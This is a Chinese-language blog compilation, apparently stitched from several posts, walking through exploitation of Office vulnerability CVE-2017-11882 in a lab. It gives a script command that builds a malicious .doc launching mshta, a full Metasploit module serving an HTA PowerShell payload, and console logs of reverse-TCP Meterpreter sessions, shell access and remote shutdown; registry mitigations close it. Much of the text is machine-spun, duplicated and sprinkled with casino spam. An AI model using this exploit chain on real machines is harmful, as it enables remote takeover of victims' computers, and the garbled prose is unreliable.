CVE-2017-11882破绽使用

中兔时候接受了推送的纰漏预警,在网上搜寻相关音信来看成千上万大牛已经付出出生成doc文档的本子和msf的poc,本文记录CVE-2017-11882
漏洞在 Msf下的施用。

下狗时候接受了推送的漏洞预警,在网上寻找相关新闻看来众多大牛已经支付出生成doc文档的脚本和msf的poc,本文记录CVE-2017-11882
漏洞在 Msf下的施用。

 

风行Office的CVE-2017-11882的poc刚刚发布出来,令人气象一新,完美无弹窗,无视宏,影响Ms
offcie全版本,对于商家的话危机很大。在此简单说下这一个漏洞的复现和采纳进程。

 

 

Office隐藏17年的尾巴CVE_2017_11882测试记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参考文章1:

参照文章2:

 

POC地址:

 

中间环节现身,msf连接数据库退步的情况,解决办法:

 

1.创造标准

 

 

此间搭建两台虚拟机举办测试!

 

测试机配置消息:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

率先在kali下安装nginx,或者tomcat应该也是足以的,首先将扭转的doc文件放在/usr/share/nginx/html目录下,方便被口诛笔伐的机械获取doc文件。

 

启动nginx服务:systemctl start nginx

Msf利用复现,11882尾巴使用。 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c
“mshta ;; -o cev2.doc

#
将下载好的尾巴模块放在msf任意目录下

root@kali:/# mv cve_2017_11882.rb
/usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的情节如下:

##

#
This module requires Metasploit:

#
Current source:

##

class
MetasploitModule  < Msf::Exploit::Remote

  Rank =
NormalRanking

  include
Msf::Exploit::Remote::HttpServer

  def
initialize(info  = {})

    super(update_info(info,

      ‘Name’
=> ‘Microsoft Office Payload Delivery’,

      ‘Description’
=> %q{

        This
module generates an command to place within

        a
word document, that when executed, will retrieve a HTA payload

        via
HTTP from an web server. Currently have not figured out how

        to
generate a doc.

      },

      ‘License’
=> MSF_LICENSE,

      ‘Arch’
=> ARCH_X86,

      ‘Platform’
=> ‘win’,

      ‘Targets’
=>

        [

          [‘Automatic’,
{} ],

        ],

      ‘DefaultTarget’
=> 0,

    ))

  end

  def
on_request_uri(cli, _request)

    print_status(“Delivering
payload”)

    p
= regenerate_payload(cli)

    data =
Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      ‘win’,

      p.encoded,

      ‘hta-psh’,

      {
:arch => ARCH_X86, :platform => ‘win ‘}

    )

    send_response(cli,
data, ‘Content-Type’ => ‘application/hta’)

  end

  def
primer

    url =
get_uri

    print_status(“Place
the following DDE in an MS document:”)

    print_line(“mshta.exe
\”#{url}\””)

  end

 

下一场,那里在动用msfconsole以前,需求先打开数据库,例如 service postgresql start 

开辟数据库之后,进入msfconsole,然后对msf举行开头化,执行msf
init

之后search
cve_2017_11882寻找漏洞模块,然后按照【参考文章2】举办配置,最终exploit 之后启动对 8080
端口的监听,至于何以是8080端口我也不太精通啊!

 

2.万事俱备,只欠北风

 

其一时候,只要求在 win7
上通过浏览器的到
cve2.doc文档,打开之后,kali中命令行立刻突显已经取获得了三番五次,

澳门金沙国际 1

澳门金沙国际 2

session命令得到回应,session -i 【id】建立连接

shell命令可以获取cmd,执行net user查看用户

澳门金沙国际 3

澳门金沙国际 4

 

3.试行效果

 

经过那几个漏洞,可以横行霸道的推行一些命令,例如关机,删除一些文本,收集一些系统新闻或者万分实用的

在桌面新建文件夹

澳门金沙国际 5

长途关机

澳门金沙国际 6

就算获得到了命令行,可是经过net
user命令可以看到登录的用户级别是Guest,这就限制了部分急需权限较高的吩咐执行!

并且那里win7没有安装杀软,我不晓得安装杀软之后word文档会不会被查杀呢?

 

 

 

0x00 漏洞简介

二〇一七年8月14日,微软公布了3月份的安全补丁更新,其中相比引人关心的莫过于悄然修复了隐形17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响当下风行的保有Office版本。攻击者可以动用漏洞以近期报到的用户的身份实施任意命令。
由于漏洞影响面较广,漏洞揭发后,金睛安全研商团体持续对漏洞有关攻击事件进展关怀。十一月19日,监控到了已有漏洞POC在网上流传,随即飞速对有关样本举办通晓析。方今该样本全球仅微软杀毒能够检测。

  • 漏洞影响版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

0x00 漏洞简介

二〇一七年三月14日,微软揭示了四月份的安全补丁更新,其中相比较引人关怀的实际上悄然修复了藏匿17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响当下流行的拥有Office版本。攻击者可以运用漏洞以当下登录的用户的地方实施任意命令。
由于漏洞影响面较广,漏洞表露后,金睛安全探讨团队持续对漏洞有关攻击事件进行关切。十月19日,监控到了已有尾巴POC在网上流传,随即急忙对相关样本进行了剖析。近日该样本全世界仅微软杀毒可以检测。

  • 漏洞影响版本:
  • Office 365
  • Microsoft Office 2000
  • Microsoft Office 2003
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

 

 

 

 

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office2013、激活工具

  3. win7旗舰版ISO镜像

如上工具已经打包好,下载地址:

链接:  密码:xl91

澳门金沙国际 7

 

0x01 利用工具清单:

a) tcp反弹:kali 172.16.253.76 

b) 安装office2013的系统:win7 172.16.253.4

 

  1. Msf 用到的 Poc

  2. office2013、激活工具

  3. win7旗舰版ISO镜像

如上工具已经打包好,下载地址:

链接:  密码:xl91

澳门金沙国际 8

 

POC地址:

0x02 利用进程

  1. 生成doc

    #安装启动nginx
    [root@ihoneysec ~]# yum -y install nginx
    [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本
    [root@ihoneysec ~]# git clone
    [root@ihoneysec ~]# cd CVE-2017-11882/
    [root@ihoneysec CVE-2017-11882]# ls
    Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测试doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o cve.doc
    [*] Done ! output file –> cve.doc
    [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “mshta ” -o cve2.doc
    [*] Done ! output file –> cve2.doc
    [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网站根目录
    [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
    404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

  

  1. 测试正常弹出calc.exe总括器

澳门金沙国际 9

 

  1. kali msf配置Poc:

    root@kali:~# cd /
    # 将下载好的尾巴模块放在msf任意目录下
    root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
    # 检查ip地址
    root@kali:/mnt/hgfs/kalishare# ifconfig
    eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf
    root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

        =[ metasploit v4.16.6-dev                          ]
    
    • — –=[ 1683 exploits – 964 auxiliary – 297 post ]
    • — –=[ 498 payloads – 40 encoders – 10 nops ]
    • — –=[ Free Metasploit Pro trial: ]
      # 搜索cve_2017_11882 漏洞模块
      msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块
      msf > use exploit/windows/smb/cve_2017_11882
      # 设置payload为反弹tcp
      msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      # 设置本机ip
      msf exploit(cve_2017_11882) > set lhost 172.16.253.76
      lhost => 172.16.253.76
      # 设置uri的不二法门,要与第一步生成doc时陈设一致
      msf exploit(cve_2017_11882) > set URIPATH abc
      URIPATH => abc
      # 检查当前布置msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882):
      Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
      SRVPORT 8080 yes The local port to listen on.
      SSL false no Negotiate SSL for incoming connections
      SSLCert no Path to a custom SSL certificate (default is randomly generated)
      URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp):
      Name Current Setting Required Description


      EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
      LHOST 172.16.253.76 yes The listen address
      LPORT 4444 yes The listen port

      # 启动利用后,msf会监听本机8080端口,假诺win7机器打开doc触发访问172.16.253.76:8080/abc就会取得反弹到4444端口的tcp会话
      msf exploit(cve_2017_11882) > exploit
      [] Exploit running as background job 0.
      # 开头监听
      [
      ] Started reverse TCP handler on 172.16.253.76:4444
      msf exploit(cve_2017_11882) > [] Using URL:
      [
      ] Local IP:
      [] Server started.
      [
      ] Place the following DDE in an MS document:
      mshta.exe “”
      msf exploit(cve_2017_11882) > [] 172.16.253.4 cve_2017_11882 – Delivering payload
      [
      ] Sending stage (179267 bytes) to 172.16.253.4 #收到反弹tcp连接
      [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
      [
      ] 172.16.253.4 cve_2017_11882 – Delivering payload
      [] Sending stage (179267 bytes) to 172.16.253.4
      [
      ] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) > sessions
      # 查看已经确立的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PC\win7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)
      # 进入id为1的会话
      msf exploit(cve_2017_11882) > sessions -i 1
      [*] Starting interaction with 1…
      # 验证获得反弹连接是还是不是是win7机器ip
      meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection
      Hardware MAC : 00:0c:29:72:2e:7d
      MTU : 1500
      IPv4 Address : 172.16.253.4
      IPv4 Netmask : 255.255.0.0
      IPv6 Address : fe80::c15d:3813:94ec:d6c8
      IPv6 Netmask : ffff:ffff:ffff:ffff::

      ……
      # 进入命令方式meterpreter > shell
      Process 2924 created.
      Channel 1 created.
      Microsoft Windows [�汾 6.1.7601]
      ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
      # 查看当前系统用户、主机名
      C:\Windows\system32>net user
      net user

      \WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:\Windows\system32>

  

 

0x02 利用进度

  1. 生成doc

    #安装启动nginx
    [root@ihoneysec ~]# yum -y install nginx
    [root@ihoneysec ~]# cd /usr/share/nginx/html/
    [root@ihoneysec html]# systemctl start nginx

    #下载生成doc的python脚本
    [root@ihoneysec ~]# git clone
    [root@ihoneysec ~]# cd CVE-2017-11882/
    [root@ihoneysec CVE-2017-11882]# ls
    Command109b_CVE-2017-11882.py Command43b_CVE-2017-11882.py example README.md

    #生成测试doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o cve.doc
    [*] Done ! output file –> cve.doc
    [root@ihoneysec CVE-2017-11882]# cp cve.doc /usr/share/nginx/html/

    #生成msf利用的doc
    [root@ihoneysec CVE-2017-11882]# python Command43b_CVE-2017-11882.py -c “mshta ” -o cve2.doc
    [*] Done ! output file –> cve2.doc
    [root@ihoneysec CVE-2017-11882]# cp cve2.doc /usr/share/nginx/html/

    #放到网站根目录
    [root@ihoneysec CVE-2017-11882]# ls /usr/share/nginx/html/
    404.html 50x.html cve.doc cve2.doc index.html nginx-logo.png poweredby.png

  

  1. 测试正常弹出calc.exe总结器

澳门金沙国际 10

 

  1. kali msf配置Poc:

    root@kali:~# cd /
    # 将下载好的纰漏模块放在msf任意目录下
    root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
    # 检查ip地址
    root@kali:/mnt/hgfs/kalishare# ifconfig
    eth0: flags=4163 mtu 1500

         inet 172.16.253.76  netmask 255.255.0.0  broadcast 172.16.255.255
         inet6 fe80::20c:29ff:fef5:82af  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:f5:82:af  txqueuelen 1000  (Ethernet)
         RX packets 3136  bytes 987402 (964.2 KiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 255  bytes 20912 (20.4 KiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    

    # 启动postgresql服务,打开msf
    root@kali:/mnt/hgfs/kalishare# service postgresql start
    root@kali:/mnt/hgfs/kalishare# msfconsole

        =[ metasploit v4.16.6-dev                          ]
    
    • — –=[ 1683 exploits – 964 auxiliary – 297 post ]
    • — –=[ 498 payloads – 40 encoders – 10 nops ]
    • — –=[ Free Metasploit Pro trial: ]
      # 搜索cve_2017_11882 漏洞模块
      msf > search cve_2017_11882

      Matching Modules

      Name Disclosure Date Rank Description


      exploit/windows/smb/cve_2017_11882 normal Microsoft Office Payload Delivery

      # 使用该模块
      msf > use exploit/windows/smb/cve_2017_11882
      # 设置payload为反弹tcp
      msf exploit(cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      # 设置本机ip
      msf exploit(cve_2017_11882) > set lhost 172.16.253.76
      lhost => 172.16.253.76
      # 设置uri的路子,要与第一步生成doc时布置一致
      msf exploit(cve_2017_11882) > set URIPATH abc
      URIPATH => abc
      # 检查当前陈设msf exploit(cve_2017_11882) > show options

      Module options (exploit/windows/smb/cve_2017_11882):
      Name Current Setting Required Description


      SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
      SRVPORT 8080 yes The local port to listen on.
      SSL false no Negotiate SSL for incoming connections
      SSLCert no Path to a custom SSL certificate (default is randomly generated)
      URIPATH abc no The URI to use for this exploit (default is random)

      Payload options (windows/meterpreter/reverse_tcp):
      Name Current Setting Required Description


      EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
      LHOST 172.16.253.76 yes The listen address
      LPORT 4444 yes The listen port

      # 启动利用后,msf会监听本机8080端口,假使win7机器打开doc触发访问172.16.253.76:8080/abc就会拿走反弹到4444端口的tcp会话
      msf exploit(cve_2017_11882) > exploit
      [] Exploit running as background job 0.
      # 最先监听
      [
      ] Started reverse TCP handler on 172.16.253.76:4444
      msf exploit(cve_2017_11882) > [] Using URL:
      [
      ] Local IP:
      [] Server started.
      [
      ] Place the following DDE in an MS document:
      mshta.exe “”
      msf exploit(cve_2017_11882) > [] 172.16.253.4 cve澳门金沙国际 ,_2017_11882 – Delivering payload
      [
      ] Sending stage (179267 bytes) to 172.16.253.4 #收到反弹tcp连接
      [] Meterpreter session 1 opened (172.16.253.76:4444 -> 172.16.253.4:49272) at 2017-11-23 15:14:06 +0800
      [
      ] 172.16.253.4 cve_2017_11882 – Delivering payload
      [] Sending stage (179267 bytes) to 172.16.253.4
      [
      ] Meterpreter session 2 opened (172.16.253.76:4444 -> 172.16.253.4:49274) at 2017-11-23 15:14:17 +0800

      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) >
      msf exploit(cve_2017_11882) > sessions
      # 查看已经确立的反弹会话

      Active sessions

      Id Type Information Connection


      1 meterpreter x86/windows win7-PC\win7 @ WIN7-PC 172.16.253.76:4444 -> 172.16.253.4:49272 (172.16.253.4)
      # 进入id为1的会话
      msf exploit(cve_2017_11882) > sessions -i 1
      [*] Starting interaction with 1…
      # 验证获得反弹连接是或不是是win7机器ip
      meterpreter > ipconfig

      Interface 11

      Name : Intel(R) PRO/1000 MT Network Connection
      Hardware MAC : 00:0c:29:72:2e:7d
      MTU : 1500
      IPv4 Address : 172.16.253.4
      IPv4 Netmask : 255.255.0.0
      IPv6 Address : fe80::c15d:3813:94ec:d6c8
      IPv6 Netmask : ffff:ffff:ffff:ffff::

      ……
      # 进入命令形式meterpreter > shell
      Process 2924 created.
      Channel 1 created.
      Microsoft Windows [�汾 6.1.7601]
      ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
      # 查看当前系统用户、主机名
      C:\Windows\system32>net user
      net user

      \WIN7-PC ���û��ʻ�


    Administrator Guest win7
    �����ɹ����ɡ�

C:\Windows\system32>

  

 

下载Command43b_CVE-2017-11882.py脚本文本(文末分享云盘链接)。

 

行使的法门很粗略,执行上面发号施令,生成漏洞doc文件。

 

python Command_CVE-2017-11882.py -c
“cmd.exe /c calc.exe” -o test.doc

 

澳门金沙国际 11

 

 

使用office
2013打开,直接实施。

 

澳门金沙国际 12

 

 

 

 

有关怎么越来越运用,可以接纳msf举行攻击。

 

那里有个小技巧,因为命令长度有43字符的限量,可以使用URIPATH设置路径,尽量短一点,防止加起来超过43字符。

那里自己仔细说一下,希望每个人都能看懂。

 

准备阶段:

kali:192.168.104

win7:192.168.1.132

win7里面的doc文件可以用office打开。我的win7虚拟机用的是office2013(文末分享)

 

澳门金沙国际 13

 澳门金沙国际 14

 

首先打开kali,查看
IP,可以观望自己的虚拟机kali的
IP是192.168.1.104。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就可以。接下来就要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一块呢。

ms17-010.rb文件的不二法门是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把PS_shell.rb放smb下面,和ms17-010在一起。

预备工作加强了,接下去就是msf上场了。

输入msfconsole,然后reload_all,重新加载所有模块。

接下去输入指令:search PS_shell

use /exploits/windows/smb/PS_shell

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.104

set uripath abc

exploit

会出现 started reverse tcp hander on 192.168.1.104:4444

using url,local ip,,,

mshta.exe “”

 

接下去就到了 Command43b_CVE-2017-11882.py
上场了。

眼前说到,大家是把py文件放 kali
桌面的,所以在 kali 执行的时候路径要留心。

cd Desktop

输入指令:python Command43b_CVE-2017-11882.py -c “mshta
” -o test.doc

会在同目录生成 test.doc 文件。

然后复制到 win7里面用 office2013
打开。

win7 打开的时候,msf 输入 sessions

大功告成重返 shell。

切切实实请看截图,至此CVE-2017-11882漏洞使用甘休,上边还足以开展一漫山遍野渗透了。

 

澳门金沙国际 15

 澳门金沙国际 16

 澳门金沙国际 17

 

 

 

 

修复方案:

1.下载微软对此漏洞补丁:

2.在注册表中禁用该漏洞模块

reg add
“HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM
Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility
Flags” /t REG_DWORD /d 0x400

reg add
“HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM
Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility
Flags” /t REG_DWORD/d 0x400

 

 

 

Command43b_CVE-2017-11882.py:(链接:
密码: 5ap6)

PS_shell.rb:(链接:
密码: rkwy)

office2013:(链接:
密码: q66f)

本文链接(

一言九鼎!

相关文章